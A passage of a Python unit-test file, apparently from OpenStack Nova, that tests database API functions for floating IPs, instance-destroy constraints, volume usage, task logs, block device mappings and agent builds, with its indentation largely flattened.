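    # _ip_range_splitter is assumed to break the address list into chunks
    # (the 256 threshold suggests per-/24 ranges) before issuing deletes, so
    # a list spanning several chunks is needed to exercise the splitting
    # path. The chunking could look like the following sketch (an
    # assumption, not the real helper):
    #
    #     def _chunks(addresses, size=256):
    #         for i in range(0, len(addresses), size):
    #             yield addresses[i:i + size]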
def test_floating_ip_create(self):
floating_ip = self._create_floating_ip({})
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self.assertIsNotNone(floating_ip['id'])
self._assertEqualObjects(floating_ip, self._get_base_values(),
ignored_keys)
def test_floating_ip_create_duplicate(self):
self._create_floating_ip({})
self.assertRaises(exception.FloatingIpExists,
self._create_floating_ip, {})
def _create_fixed_ip(self, params):
default_params = {'address': '192.168.0.1'}
default_params.update(params)
return db.fixed_ip_create(self.ctxt, default_params)['address']
def test_floating_ip_fixed_ip_associate(self):
float_addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
fixed_addresses = ['2.2.2.1', '2.2.2.2', '2.2.2.3']
float_ips = [self._create_floating_ip({'address': address})
for address in float_addresses]
fixed_addrs = [self._create_fixed_ip({'address': address})
for address in fixed_addresses]
for float_ip, fixed_addr in zip(float_ips, fixed_addrs):
fixed_ip = db.floating_ip_fixed_ip_associate(self.ctxt,
float_ip.address,
fixed_addr, 'host')
self.assertEqual(fixed_ip.address, fixed_addr)
updated_float_ip = db.floating_ip_get(self.ctxt, float_ip.id)
self.assertEqual(fixed_ip.id, updated_float_ip.fixed_ip_id)
self.assertEqual('host', updated_float_ip.host)
        # Test that associating an already associated float_ip returns None
result = db.floating_ip_fixed_ip_associate(self.ctxt,
float_addresses[0],
fixed_addresses[0], 'host')
self.assertIsNone(result)
def test_floating_ip_fixed_ip_associate_float_ip_not_found(self):
self.assertRaises(exception.FloatingIpNotFoundForAddress,
db.floating_ip_fixed_ip_associate,
self.ctxt, '10.10.10.10', 'some', 'some')
def test_floating_ip_deallocate(self):
values = {'address': '1.1.1.1', 'project_id': 'fake', 'host': 'fake'}
float_ip = self._create_floating_ip(values)
rows_updated = db.floating_ip_deallocate(self.ctxt, float_ip.address)
self.assertEqual(1, rows_updated)
updated_float_ip = db.floating_ip_get(self.ctxt, float_ip.id)
self.assertIsNone(updated_float_ip.project_id)
self.assertIsNone(updated_float_ip.host)
self.assertFalse(updated_float_ip.auto_assigned)
def test_floating_ip_deallocate_address_not_found(self):
self.assertEqual(0, db.floating_ip_deallocate(self.ctxt, '2.2.2.2'))
def test_floating_ip_destroy(self):
addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
float_ips = [self._create_floating_ip({'address': addr})
for addr in addresses]
expected_len = len(addresses)
for float_ip in float_ips:
db.floating_ip_destroy(self.ctxt, float_ip.address)
self.assertRaises(exception.FloatingIpNotFound,
db.floating_ip_get, self.ctxt, float_ip.id)
expected_len -= 1
if expected_len > 0:
self.assertEqual(expected_len,
len(db.floating_ip_get_all(self.ctxt)))
else:
self.assertRaises(exception.NoFloatingIpsDefined,
db.floating_ip_get_all, self.ctxt)
def test_floating_ip_disassociate(self):
float_addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
fixed_addresses = ['2.2.2.1', '2.2.2.2', '2.2.2.3']
float_ips = [self._create_floating_ip({'address': address})
for address in float_addresses]
fixed_addrs = [self._create_fixed_ip({'address': address})
for address in fixed_addresses]
for float_ip, fixed_addr in zip(float_ips, fixed_addrs):
db.floating_ip_fixed_ip_associate(self.ctxt,
float_ip.address,
fixed_addr, 'host')
for float_ip, fixed_addr in zip(float_ips, fixed_addrs):
fixed = db.floating_ip_disassociate(self.ctxt, float_ip.address)
self.assertEqual(fixed.address, fixed_addr)
updated_float_ip = db.floating_ip_get(self.ctxt, float_ip.id)
self.assertIsNone(updated_float_ip.fixed_ip_id)
self.assertIsNone(updated_float_ip.host)
def test_floating_ip_disassociate_not_found(self):
self.assertRaises(exception.FloatingIpNotFoundForAddress,
db.floating_ip_disassociate, self.ctxt,
'11.11.11.11')
def test_floating_ip_get_all(self):
addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
float_ips = [self._create_floating_ip({'address': addr})
for addr in addresses]
self._assertEqualListsOfObjects(float_ips,
db.floating_ip_get_all(self.ctxt),
ignored_keys="fixed_ip")
def test_floating_ip_get_all_associated(self):
instance = db.instance_create(self.ctxt, {'uuid': 'fake'})
float_ip = self._create_floating_ip({'address': '1.1.1.1'})
fixed_ip = self._create_fixed_ip({'address': '2.2.2.2',
'instance_uuid': instance.uuid})
db.floating_ip_fixed_ip_associate(self.ctxt,
float_ip.address,
fixed_ip,
'host')
float_ips = db.floating_ip_get_all(self.ctxt)
self.assertEqual(1, len(float_ips))
self.assertEqual(float_ip.address, float_ips[0].address)
self.assertEqual(fixed_ip, float_ips[0].fixed_ip.address)
self.assertEqual(instance.uuid, float_ips[0].fixed_ip.instance_uuid)
def test_floating_ip_get_all_not_found(self):
self.assertRaises(exception.NoFloatingIpsDefined,
db.floating_ip_get_all, self.ctxt)
def test_floating_ip_get_all_by_host(self):
hosts = {
'host1': ['1.1.1.1', '1.1.1.2'],
'host2': ['2.1.1.1', '2.1.1.2'],
'host3': ['3.1.1.1', '3.1.1.2', '3.1.1.3']
}
hosts_with_float_ips = {}
for host, addresses in hosts.iteritems():
hosts_with_float_ips[host] = []
for address in addresses:
float_ip = self._create_floating_ip({'host': host,
'address': address})
hosts_with_float_ips[host].append(float_ip)
for host, float_ips in hosts_with_float_ips.iteritems():
real_float_ips = db.floating_ip_get_all_by_host(self.ctxt, host)
self._assertEqualListsOfObjects(float_ips, real_float_ips,
ignored_keys="fixed_ip")
def test_floating_ip_get_all_by_host_not_found(self):
self.assertRaises(exception.FloatingIpNotFoundForHost,
db.floating_ip_get_all_by_host,
self.ctxt, 'non_exists_host')
def test_floating_ip_get_all_by_project(self):
projects = {
'pr1': ['1.1.1.1', '1.1.1.2'],
'pr2': ['2.1.1.1', '2.1.1.2'],
'pr3': ['3.1.1.1', '3.1.1.2', '3.1.1.3']
}
projects_with_float_ips = {}
for project_id, addresses in projects.iteritems():
projects_with_float_ips[project_id] = []
for address in addresses:
float_ip = self._create_floating_ip({'project_id': project_id,
'address': address})
projects_with_float_ips[project_id].append(float_ip)
for project_id, float_ips in projects_with_float_ips.iteritems():
real_float_ips = db.floating_ip_get_all_by_project(self.ctxt,
project_id)
self._assertEqualListsOfObjects(float_ips, real_float_ips,
ignored_keys='fixed_ip')
def test_floating_ip_get_all_by_project_not_authorized(self):
ctxt = context.RequestContext(user_id='a', project_id='abc',
is_admin=False)
self.assertRaises(exception.Forbidden,
db.floating_ip_get_all_by_project,
ctxt, 'other_project')
def test_floating_ip_get_by_address(self):
addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
float_ips = [self._create_floating_ip({'address': addr})
for addr in addresses]
for float_ip in float_ips:
real_float_ip = db.floating_ip_get_by_address(self.ctxt,
float_ip.address)
self._assertEqualObjects(float_ip, real_float_ip,
ignored_keys='fixed_ip')
def test_floating_ip_get_by_address_not_found(self):
self.assertRaises(exception.FloatingIpNotFoundForAddress,
db.floating_ip_get_by_address,
self.ctxt, '20.20.20.20')
def test_floating_ip_get_by_invalid_address(self):
self.mock_db_query_first_to_raise_data_error_exception()
self.assertRaises(exception.InvalidIpAddressError,
db.floating_ip_get_by_address,
self.ctxt, 'non_exists_host')
def test_floating_ip_get_by_fixed_address(self):
fixed_float = [
('1.1.1.1', '2.2.2.1'),
('1.1.1.2', '2.2.2.2'),
('1.1.1.3', '2.2.2.3')
]
for fixed_addr, float_addr in fixed_float:
self._create_floating_ip({'address': float_addr})
self._create_fixed_ip({'address': fixed_addr})
db.floating_ip_fixed_ip_associate(self.ctxt, float_addr,
fixed_addr, 'some_host')
for fixed_addr, float_addr in fixed_float:
float_ip = db.floating_ip_get_by_fixed_address(self.ctxt,
fixed_addr)
self.assertEqual(float_addr, float_ip[0]['address'])
def test_floating_ip_get_by_fixed_ip_id(self):
fixed_float = [
('1.1.1.1', '2.2.2.1'),
('1.1.1.2', '2.2.2.2'),
('1.1.1.3', '2.2.2.3')
]
for fixed_addr, float_addr in fixed_float:
self._create_floating_ip({'address': float_addr})
self._create_fixed_ip({'address': fixed_addr})
db.floating_ip_fixed_ip_associate(self.ctxt, float_addr,
fixed_addr, 'some_host')
for fixed_addr, float_addr in fixed_float:
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, fixed_addr)
float_ip = db.floating_ip_get_by_fixed_ip_id(self.ctxt,
fixed_ip['id'])
self.assertEqual(float_addr, float_ip[0]['address'])
def test_floating_ip_update(self):
float_ip = self._create_floating_ip({})
values = {
'project_id': 'some_pr',
'host': 'some_host',
'auto_assigned': True,
'interface': 'some_interface',
'pool': 'some_pool'
}
floating_ref = db.floating_ip_update(self.ctxt, float_ip['address'],
values)
self.assertIsNotNone(floating_ref)
updated_float_ip = db.floating_ip_get(self.ctxt, float_ip['id'])
self._assertEqualObjects(updated_float_ip, values,
ignored_keys=['id', 'address', 'updated_at',
'deleted_at', 'created_at',
'deleted', 'fixed_ip_id',
'fixed_ip'])
def test_floating_ip_update_to_duplicate(self):
float_ip1 = self._create_floating_ip({'address': '1.1.1.1'})
float_ip2 = self._create_floating_ip({'address': '1.1.1.2'})
self.assertRaises(exception.FloatingIpExists,
db.floating_ip_update,
self.ctxt, float_ip2['address'],
{'address': float_ip1['address']})
class InstanceDestroyConstraints(test.TestCase):
def test_destroy_with_equal_any_constraint_met_single_value(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'task_state': 'deleting'})
constraint = db.constraint(task_state=db.equal_any('deleting'))
db.instance_destroy(ctx, instance['uuid'], constraint)
self.assertRaises(exception.InstanceNotFound, db.instance_get_by_uuid,
ctx, instance['uuid'])
def test_destroy_with_equal_any_constraint_met(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'task_state': 'deleting'})
constraint = db.constraint(task_state=db.equal_any('deleting',
'error'))
db.instance_destroy(ctx, instance['uuid'], constraint)
self.assertRaises(exception.InstanceNotFound, db.instance_get_by_uuid,
ctx, instance['uuid'])
def test_destroy_with_equal_any_constraint_not_met(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'vm_state': 'resize'})
constraint = db.constraint(vm_state=db.equal_any('active', 'error'))
self.assertRaises(exception.ConstraintNotMet, db.instance_destroy,
ctx, instance['uuid'], constraint)
instance = db.instance_get_by_uuid(ctx, instance['uuid'])
self.assertFalse(instance['deleted'])
def test_destroy_with_not_equal_constraint_met(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'task_state': 'deleting'})
constraint = db.constraint(task_state=db.not_equal('error', 'resize'))
db.instance_destroy(ctx, instance['uuid'], constraint)
self.assertRaises(exception.InstanceNotFound, db.instance_get_by_uuid,
ctx, instance['uuid'])
def test_destroy_with_not_equal_constraint_not_met(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'vm_state': 'active'})
constraint = db.constraint(vm_state=db.not_equal('active', 'error'))
self.assertRaises(exception.ConstraintNotMet, db.instance_destroy,
ctx, instance['uuid'], constraint)
instance = db.instance_get_by_uuid(ctx, instance['uuid'])
self.assertFalse(instance['deleted'])
class VolumeUsageDBApiTestCase(test.TestCase):
def setUp(self):
super(VolumeUsageDBApiTestCase, self).setUp()
self.user_id = 'fake'
self.project_id = 'fake'
self.context = context.RequestContext(self.user_id, self.project_id)
self.useFixture(test.TimeOverride())
def test_vol_usage_update_no_totals_update(self):
ctxt = context.get_admin_context()
now = timeutils.utcnow()
timeutils.set_time_override(now)
start_time = now - datetime.timedelta(seconds=10)
expected_vol_usages = {
u'1': {'volume_id': u'1',
'instance_uuid': 'fake-instance-uuid1',
'project_id': 'fake-project-uuid1',
'user_id': 'fake-user-uuid1',
'curr_reads': 1000,
'curr_read_bytes': 2000,
'curr_writes': 3000,
'curr_write_bytes': 4000,
'curr_last_refreshed': now,
'tot_reads': 0,
'tot_read_bytes': 0,
'tot_writes': 0,
'tot_write_bytes': 0,
'tot_last_refreshed': None},
u'2': {'volume_id': u'2',
'instance_uuid': 'fake-instance-uuid2',
'project_id': 'fake-project-uuid2',
'user_id': 'fake-user-uuid2',
'curr_reads': 100,
'curr_read_bytes': 200,
'curr_writes': 300,
'curr_write_bytes': 400,
'tot_reads': 0,
'tot_read_bytes': 0,
'tot_writes': 0,
'tot_write_bytes': 0,
'tot_last_refreshed': None}
}
def _compare(vol_usage, expected):
for key, value in expected.items():
self.assertEqual(vol_usage[key], value)
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
self.assertEqual(len(vol_usages), 0)
db.vol_usage_update(ctxt, u'1', rd_req=10, rd_bytes=20,
wr_req=30, wr_bytes=40,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
user_id='fake-user-uuid1',
availability_zone='fake-az')
db.vol_usage_update(ctxt, u'2', rd_req=100, rd_bytes=200,
wr_req=300, wr_bytes=400,
instance_id='fake-instance-uuid2',
project_id='fake-project-uuid2',
user_id='fake-user-uuid2',
availability_zone='fake-az')
db.vol_usage_update(ctxt, u'1', rd_req=1000, rd_bytes=2000,
wr_req=3000, wr_bytes=4000,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
user_id='fake-user-uuid1',
availability_zone='fake-az')
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
self.assertEqual(len(vol_usages), 2)
for usage in vol_usages:
_compare(usage, expected_vol_usages[usage.volume_id])
def test_vol_usage_update_totals_update(self):
ctxt = context.get_admin_context()
now = datetime.datetime(1, 1, 1, 1, 0, 0)
start_time = now - datetime.timedelta(seconds=10)
now1 = now + datetime.timedelta(minutes=1)
now2 = now + datetime.timedelta(minutes=2)
now3 = now + datetime.timedelta(minutes=3)
timeutils.set_time_override(now)
db.vol_usage_update(ctxt, u'1', rd_req=100, rd_bytes=200,
wr_req=300, wr_bytes=400,
instance_id='fake-instance-uuid',
project_id='fake-project-uuid',
user_id='fake-user-uuid',
availability_zone='fake-az')
current_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
self.assertEqual(current_usage['tot_reads'], 0)
self.assertEqual(current_usage['curr_reads'], 100)
timeutils.set_time_override(now1)
db.vol_usage_update(ctxt, u'1', rd_req=200, rd_bytes=300,
wr_req=400, wr_bytes=500,
instance_id='fake-instance-uuid',
project_id='fake-project-uuid',
user_id='fake-user-uuid',
availability_zone='fake-az',
update_totals=True)
current_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
self.assertEqual(current_usage['tot_reads'], 200)
self.assertEqual(current_usage['curr_reads'], 0)
timeutils.set_time_override(now2)
db.vol_usage_update(ctxt, u'1', rd_req=300, rd_bytes=400,
wr_req=500, wr_bytes=600,
instance_id='fake-instance-uuid',
project_id='fake-project-uuid',
availability_zone='fake-az',
user_id='fake-user-uuid')
current_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
self.assertEqual(current_usage['tot_reads'], 200)
self.assertEqual(current_usage['curr_reads'], 300)
timeutils.set_time_override(now3)
db.vol_usage_update(ctxt, u'1', rd_req=400, rd_bytes=500,
wr_req=600, wr_bytes=700,
instance_id='fake-instance-uuid',
project_id='fake-project-uuid',
user_id='fake-user-uuid',
availability_zone='fake-az',
update_totals=True)
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
expected_vol_usages = {'volume_id': u'1',
'project_id': 'fake-project-uuid',
'user_id': 'fake-user-uuid',
'instance_uuid': 'fake-instance-uuid',
'availability_zone': 'fake-az',
'tot_reads': 600,
'tot_read_bytes': 800,
'tot_writes': 1000,
'tot_write_bytes': 1200,
'tot_last_refreshed': now3,
'curr_reads': 0,
'curr_read_bytes': 0,
'curr_writes': 0,
'curr_write_bytes': 0,
'curr_last_refreshed': now2}
self.assertEqual(1, len(vol_usages))
for key, value in expected_vol_usages.items():
self.assertEqual(vol_usages[0][key], value, key)
def test_vol_usage_update_when_blockdevicestats_reset(self):
ctxt = context.get_admin_context()
now = timeutils.utcnow()
start_time = now - datetime.timedelta(seconds=10)
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
self.assertEqual(len(vol_usages), 0)
db.vol_usage_update(ctxt, u'1',
rd_req=10000, rd_bytes=20000,
wr_req=30000, wr_bytes=40000,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1')
        # The instance rebooted or crashed: block device stats were reset
        # and are now lower than the previous values.
db.vol_usage_update(ctxt, u'1',
rd_req=100, rd_bytes=200,
wr_req=300, wr_bytes=400,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1')
db.vol_usage_update(ctxt, u'1',
rd_req=200, rd_bytes=300,
wr_req=400, wr_bytes=500,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1')
vol_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
expected_vol_usage = {'volume_id': u'1',
'instance_uuid': 'fake-instance-uuid1',
'project_id': 'fake-project-uuid1',
'availability_zone': 'fake-az',
'user_id': 'fake-user-uuid1',
'curr_reads': 200,
'curr_read_bytes': 300,
'curr_writes': 400,
'curr_write_bytes': 500,
'tot_reads': 10000,
'tot_read_bytes': 20000,
'tot_writes': 30000,
'tot_write_bytes': 40000}
for key, value in expected_vol_usage.items():
self.assertEqual(vol_usage[key], value, key)
def test_vol_usage_update_totals_update_when_blockdevicestats_reset(self):
        # This is unlikely to happen, but it could occur when a volume is
        # detached right after an instance has rebooted or recovered and
        # before the system polled and updated the volume usage cache table.
ctxt = context.get_admin_context()
now = timeutils.utcnow()
start_time = now - datetime.timedelta(seconds=10)
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
self.assertEqual(len(vol_usages), 0)
db.vol_usage_update(ctxt, u'1',
rd_req=10000, rd_bytes=20000,
wr_req=30000, wr_bytes=40000,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1')
        # The instance rebooted or crashed: block device stats were reset
        # and are now lower than the previous values.
db.vol_usage_update(ctxt, u'1',
rd_req=100, rd_bytes=200,
wr_req=300, wr_bytes=400,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1',
update_totals=True)
vol_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
expected_vol_usage = {'volume_id': u'1',
'instance_uuid': 'fake-instance-uuid1',
'project_id': 'fake-project-uuid1',
'availability_zone': 'fake-az',
'user_id': 'fake-user-uuid1',
'curr_reads': 0,
'curr_read_bytes': 0,
'curr_writes': 0,
'curr_write_bytes': 0,
'tot_reads': 10100,
'tot_read_bytes': 20200,
'tot_writes': 30300,
'tot_write_bytes': 40400}
for key, value in expected_vol_usage.items():
self.assertEqual(vol_usage[key], value, key)
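    # The expectations in the two reset tests above rely on an assumed
    # accounting model for vol_usage_update: curr_* columns hold counters
    # accumulated since the last rollover, tot_* columns hold everything
    # rolled over so far, and a drop in the incoming counters (guest reboot
    # or crash) is treated as a reset, folding the stored curr_* values into
    # tot_* before the new, smaller readings are recorded. With
    # update_totals=True the curr_* values are likewise folded into tot_*
    # and zeroed.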
class TaskLogTestCase(test.TestCase):
def setUp(self):
super(TaskLogTestCase, self).setUp()
self.context = context.get_admin_context()
now = timeutils.utcnow()
self.begin = now - datetime.timedelta(seconds=10)
self.end = now - datetime.timedelta(seconds=5)
self.task_name = 'fake-task-name'
self.host = 'fake-host'
self.message = 'Fake task message'
db.task_log_begin_task(self.context, self.task_name, self.begin,
self.end, self.host, message=self.message)
def test_task_log_get(self):
result = db.task_log_get(self.context, self.task_name, self.begin,
self.end, self.host)
self.assertEqual(result['task_name'], self.task_name)
self.assertEqual(result['period_beginning'], self.begin)
self.assertEqual(result['period_ending'], self.end)
self.assertEqual(result['host'], self.host)
self.assertEqual(result['message'], self.message)
def test_task_log_get_all(self):
result = db.task_log_get_all(self.context, self.task_name, self.begin,
self.end, host=self.host)
self.assertEqual(len(result), 1)
result = db.task_log_get_all(self.context, self.task_name, self.begin,
self.end, host=self.host, state='')
self.assertEqual(len(result), 0)
def test_task_log_begin_task(self):
db.task_log_begin_task(self.context, 'fake', self.begin,
self.end, self.host, task_items=42,
message=self.message)
result = db.task_log_get(self.context, 'fake', self.begin,
self.end, self.host)
self.assertEqual(result['task_name'], 'fake')
def test_task_log_begin_task_duplicate(self):
params = (self.context, 'fake', self.begin, self.end, self.host)
db.task_log_begin_task(*params, message=self.message)
self.assertRaises(exception.TaskAlreadyRunning,
db.task_log_begin_task,
*params, message=self.message)
def test_task_log_end_task(self):
errors = 1
db.task_log_end_task(self.context, self.task_name, self.begin,
self.end, self.host, errors, message=self.message)
result = db.task_log_get(self.context, self.task_name, self.begin,
self.end, self.host)
self.assertEqual(result['errors'], 1)
def test_task_log_end_task_task_not_running(self):
self.assertRaises(exception.TaskNotRunning,
db.task_log_end_task, self.context, 'nonexistent',
self.begin, self.end, self.host, 42,
message=self.message)
class BlockDeviceMappingTestCase(test.TestCase):
def setUp(self):
super(BlockDeviceMappingTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.instance = db.instance_create(self.ctxt, {})
def _create_bdm(self, values):
values.setdefault('instance_uuid', self.instance['uuid'])
values.setdefault('device_name', 'fake_device')
values.setdefault('source_type', 'volume')
values.setdefault('destination_type', 'volume')
block_dev = block_device.BlockDeviceDict(values)
db.block_device_mapping_create(self.ctxt, block_dev, legacy=False)
uuid = block_dev['instance_uuid']
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
for bdm in bdms:
if bdm['device_name'] == values['device_name']:
return bdm
def test_scrub_empty_str_values_no_effect(self):
values = {'volume_size': 5}
expected = copy.copy(values)
sqlalchemy_api._scrub_empty_str_values(values, ['volume_size'])
self.assertEqual(values, expected)
def test_scrub_empty_str_values_empty_string(self):
values = {'volume_size': ''}
sqlalchemy_api._scrub_empty_str_values(values, ['volume_size'])
self.assertEqual(values, {})
def test_scrub_empty_str_values_empty_unicode(self):
values = {'volume_size': u''}
sqlalchemy_api._scrub_empty_str_values(values, ['volume_size'])
self.assertEqual(values, {})
def test_block_device_mapping_create(self):
bdm = self._create_bdm({})
self.assertIsNotNone(bdm)
def test_block_device_mapping_update(self):
bdm = self._create_bdm({})
result = db.block_device_mapping_update(
self.ctxt, bdm['id'], {'destination_type': 'moon'},
legacy=False)
uuid = bdm['instance_uuid']
bdm_real = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(bdm_real[0]['destination_type'], 'moon')
# Also make sure the update call returned correct data
self.assertEqual(dict(bdm_real[0].iteritems()),
dict(result.iteritems()))
def test_block_device_mapping_update_or_create(self):
values = {
'instance_uuid': self.instance['uuid'],
'device_name': 'fake_name',
'source_type': 'volume',
'destination_type': 'volume'
}
# check create
db.block_device_mapping_update_or_create(self.ctxt, values,
legacy=False)
uuid = values['instance_uuid']
bdm_real = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdm_real), 1)
self.assertEqual(bdm_real[0]['device_name'], 'fake_name')
# check update
values['destination_type'] = 'camelot'
db.block_device_mapping_update_or_create(self.ctxt, values,
legacy=False)
bdm_real = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdm_real), 1)
bdm_real = bdm_real[0]
self.assertEqual(bdm_real['device_name'], 'fake_name')
self.assertEqual(bdm_real['destination_type'], 'camelot')
# check create without device_name
bdm1 = dict(values)
bdm1['device_name'] = None
db.block_device_mapping_update_or_create(self.ctxt, bdm1, legacy=False)
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
with_device_name = [b for b in bdms if b['device_name'] is not None]
without_device_name = [b for b in bdms if b['device_name'] is None]
self.assertEqual(len(with_device_name), 1,
'expected 1 bdm with device_name, found %d' %
len(with_device_name))
self.assertEqual(len(without_device_name), 1,
'expected 1 bdm without device_name, found %d' %
len(without_device_name))
# check create multiple devices without device_name
bdm2 = dict(values)
bdm2['device_name'] = None
db.block_device_mapping_update_or_create(self.ctxt, bdm2, legacy=False)
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
with_device_name = [b for b in bdms if b['device_name'] is not None]
without_device_name = [b for b in bdms if b['device_name'] is None]
self.assertEqual(len(with_device_name), 1,
'expected 1 bdm with device_name, found %d' %
len(with_device_name))
self.assertEqual(len(without_device_name), 2,
'expected 2 bdms without device_name, found %d' %
len(without_device_name))
def test_block_device_mapping_update_or_create_multiple_ephemeral(self):
uuid = self.instance['uuid']
values = {
'instance_uuid': uuid,
'source_type': 'blank',
'guest_format': 'myformat',
}
bdm1 = dict(values)
bdm1['device_name'] = '/dev/sdb'
db.block_device_mapping_update_or_create(self.ctxt, bdm1, legacy=False)
bdm2 = dict(values)
bdm2['device_name'] = '/dev/sdc'
db.block_device_mapping_update_or_create(self.ctxt, bdm2, legacy=False)
bdm_real = sorted(
db.block_device_mapping_get_all_by_instance(self.ctxt, uuid),
key=lambda bdm: bdm['device_name']
)
self.assertEqual(len(bdm_real), 2)
for bdm, device_name in zip(bdm_real, ['/dev/sdb', '/dev/sdc']):
self.assertEqual(bdm['device_name'], device_name)
self.assertEqual(bdm['guest_format'], 'myformat')
def test_block_device_mapping_update_or_create_check_remove_virt(self):
uuid = self.instance['uuid']
values = {
'instance_uuid': uuid,
'source_type': 'blank',
'destination_type': 'local',
'guest_format': 'swap',
}
# check that old swap bdms are deleted on create
val1 = dict(values)
val1['device_name'] = 'device1'
db.block_device_mapping_create(self.ctxt, val1, legacy=False)
val2 = dict(values)
val2['device_name'] = 'device2'
db.block_device_mapping_update_or_create(self.ctxt, val2, legacy=False)
bdm_real = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdm_real), 1)
bdm_real = bdm_real[0]
self.assertEqual(bdm_real['device_name'], 'device2')
self.assertEqual(bdm_real['source_type'], 'blank')
self.assertEqual(bdm_real['guest_format'], 'swap')
db.block_device_mapping_destroy(self.ctxt, bdm_real['id'])
def test_block_device_mapping_get_all_by_instance(self):
uuid1 = self.instance['uuid']
uuid2 = db.instance_create(self.ctxt, {})['uuid']
bmds_values = [{'instance_uuid': uuid1,
'device_name': '/dev/vda'},
{'instance_uuid': uuid2,
'device_name': '/dev/vdb'},
{'instance_uuid': uuid2,
'device_name': '/dev/vdc'}]
for bdm in bmds_values:
self._create_bdm(bdm)
bmd = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid1)
self.assertEqual(len(bmd), 1)
self.assertEqual(bmd[0]['device_name'], '/dev/vda')
bmd = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid2)
self.assertEqual(len(bmd), 2)
def test_block_device_mapping_destroy(self):
bdm = self._create_bdm({})
db.block_device_mapping_destroy(self.ctxt, bdm['id'])
bdm = db.block_device_mapping_get_all_by_instance(self.ctxt,
bdm['instance_uuid'])
self.assertEqual(len(bdm), 0)
def test_block_device_mapping_destroy_by_instance_and_volume(self):
vol_id1 = '69f5c254-1a5b-4fff-acf7-cb369904f58f'
vol_id2 = '69f5c254-1a5b-4fff-acf7-cb369904f59f'
self._create_bdm({'device_name': '/dev/vda', 'volume_id': vol_id1})
self._create_bdm({'device_name': '/dev/vdb', 'volume_id': vol_id2})
uuid = self.instance['uuid']
db.block_device_mapping_destroy_by_instance_and_volume(self.ctxt, uuid,
vol_id1)
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdms), 1)
self.assertEqual(bdms[0]['device_name'], '/dev/vdb')
def test_block_device_mapping_destroy_by_instance_and_device(self):
self._create_bdm({'device_name': '/dev/vda'})
self._create_bdm({'device_name': '/dev/vdb'})
uuid = self.instance['uuid']
params = (self.ctxt, uuid, '/dev/vdb')
db.block_device_mapping_destroy_by_instance_and_device(*params)
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdms), 1)
self.assertEqual(bdms[0]['device_name'], '/dev/vda')
def test_block_device_mapping_get_by_volume_id(self):
self._create_bdm({'volume_id': 'fake_id'})
bdm = db.block_device_mapping_get_by_volume_id(self.ctxt, 'fake_id')
self.assertEqual(bdm['volume_id'], 'fake_id')
def test_block_device_mapping_get_by_volume_id_join_instance(self):
self._create_bdm({'volume_id': 'fake_id'})
bdm = db.block_device_mapping_get_by_volume_id(self.ctxt, 'fake_id',
['instance'])
self.assertEqual(bdm['volume_id'], 'fake_id')
self.assertEqual(bdm['instance']['uuid'], self.instance['uuid'])
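    # The join test above assumes that passing ['instance'] as
    # columns_to_join makes block_device_mapping_get_by_volume_id eagerly
    # load the instance relation, so bdm['instance'] is populated on the
    # returned row without a separate query; without it only the plain BDM
    # columns are expected to be present.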
class AgentBuildTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.agent_build_* methods."""
def setUp(self):
super(AgentBuildTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_agent_build_create_and_get_all(self):
self.assertEqual(0, len(db.agent_build_get_all(self.ctxt)))
agent_build = db.agent_build_create(self.ctxt, {'os': 'GNU/HURD'})
all_agent_builds = db.agent_build_get_all(self.ctxt)
self.assertEqual(1, len(all_agent_builds))
self._assertEqualObjects(agent_build, all_agent_builds[0])
def test_agent_build_get_by_triple(self):
agent_build = db.agent_build_create(self.ctxt, {'hypervisor': 'kvm',
'os': 'FreeBSD', 'architecture': arch.X86_64})
self.assertIsNone(db.agent_build_get_by_triple(self.ctxt, 'kvm',
'FreeBSD', 'i386'))
self._assertEqualObjects(agent_build, db.agent_build_get_by_triple(
self.ctxt, 'kvm', 'FreeBSD', arch.X86_64))
def test_agent_build_destroy(self):
